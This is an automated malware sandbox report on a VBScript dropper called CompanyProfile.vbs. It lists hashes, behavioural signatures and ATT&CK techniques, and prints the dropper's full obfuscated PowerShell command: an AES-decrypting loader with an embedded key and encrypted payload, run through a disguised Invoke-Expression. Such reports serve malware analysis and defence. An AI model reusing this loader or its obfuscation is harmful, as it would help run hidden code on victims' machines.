a5bf9d0f1895c9eb988d0d946ccf5022f73b68005450414ddbfdb36a053e4fc0

General

Target

CompanyProfile.vbs
Size

413KB
MD5

110831ca8aa326ecd1e0c364adc7062a
SHA1

34c36ce57105514fa8a0db8ef82aec5db6bd7d34
SHA256

a5bf9d0f1895c9eb988d0d946ccf5022f73b68005450414ddbfdb36a053e4fc0
SHA512

bdd4fef931fd404f450e117b63fbbe47abc71953cee3d4e414643ec19e657ee3efd43df79b0a95fcc4254b5e4bea624b0dce5cb3839a038a20a9cfb86ffcfdf2
SSDEEP

3072:1HGYwftYFGhNe4VTdRnTT8w4TWxHqQYDgbppvicsKS7pEXGRTLYJeP0rkNyt:NwftYFgHqQD

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2536	powershell.exe
6	2536	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2536	powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2536	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2536	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2672 wrote to memory of 2536	2672	WScript.exe	30
PID 2672 wrote to memory of 2536	2672	WScript.exe	30
PID 2672 wrote to memory of 2536	2672	WScript.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CompanyProfile.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2672
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI59177120335026464218998728314136CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIzmKkjc/oJj8cPDirQ3LORavQxvCG+8m/03wRUbF5VkfGIlamS24nE0RH4GECjOESjusRZG6cFw1avNIoLX7fATicjIMCznhFsfIajd1j+0m9RyIfHSjUO+uNtcVYngOuRcsuTxYYk8UEUO+TKbs7YjmXdKtycJcHZXzeuUX3RRf7yIW7HhwRqn8yNAAkLH8aR4A06U3KhXZr72ZBEjxWaabifiCB3IDnceplZKidTor4FWLYCSdMrZPizRLfNOtNGSfCgFhE73amSu6huRlN/7xeXwonX9BqwPG0Fc8Vptfrj24qDfEFtR0BdliDWBD5g/DidB/XhMisfamvVP5v29Q48FCxf64FarHT+PstNgyJK11o2h5Emq/tonfx4XlnruL4W5256dW5y0sNsRdMu9b8hhm0KivVvO66ArkBKMfGet6oFw9mn5UDDdMtU/+wrUnrsqPLuANpeDbB9V6J/2slUyURbdUPBCxcWGOKO1LQFwi8Y9ynyPQIjjeruuF+ARW9jLnrqBQoFsm+1sIGDMALHQj6XLw6Ahel8mPM32lAI8D3Vbpd3Gg45vS5pUDF57CF60ONXntAPlKOIeTKdTDGblScbmJa3KLC1pdMT7k0GV1dAaK5qLcLiP+oiFTDv6Th7iH+7iZSqBiZFRYb7as7lAOhwf1eJkt6TFFbYOXUqPiO6WqVskZnrIsDRQva/OBVCrJL5fn0rR42xfg60I4vV+2Z0FORcV/wzmtv9jSmstpyzpDgGXAnXF9rJMVNJ5OJV2qNQPl5i/y+4x2kR/YqLCJVrLqKa4e2rqeTKXnFWMVFjwjm8joBLG7sVt0iZcX49QmJt3b7B4zTxRTJYh16Gg8NQvCL6RXSan+LTFQZuEr40Sojo6Z5HvYYS8TR/l7JG+Ek5pGtGzHS6n9W4zXK7R3CtdLYZ8/ED2zqKjwv2dg/EAvofKnwj/LLvxMQsHQSOxnJlH1NCSlaJQaWj23U1Ix1eGHn1eEUukv6jw42KKKQngTNS38Vl/NjTfDyiqhBhurMuEwaVpsSbKR4FrdOROoMzKO6QhaDKmhvwVMs4B52WjHuuLEfYXUBdATTZD/n+dy8YaT5D+aEym6sYS8o1A8pUIJ3ctYHrsOn2DXm23Ea3Kz52cnlnJSGhoeHXAP9vp4tUpDQcJHhWO6TiVfo1PAU12mCiSPNC7HWebh0n0zlj4uD6FDTU2IW5wBmw5pXHZL+/PMXN6XvBDGRmetvV6NHO7jWYm/tgo48zKhuhmuvJBDbQ/Nd/9BMsL5L0/oKC+YWViH1lieS6cB01w==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2536-4-0x000007FEF641E000-0x000007FEF641F000-memory.dmp

Filesize
4KB

Download
memory/2536-6-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/2536-5-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2536-9-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/2536-10-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/2536-8-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/2536-7-0x00000000028E0000-0x00000000028E8000-memory.dmp

Filesize
32KB

Download
memory/2536-11-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download
memory/2536-12-0x000007FEF6160000-0x000007FEF6AFD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing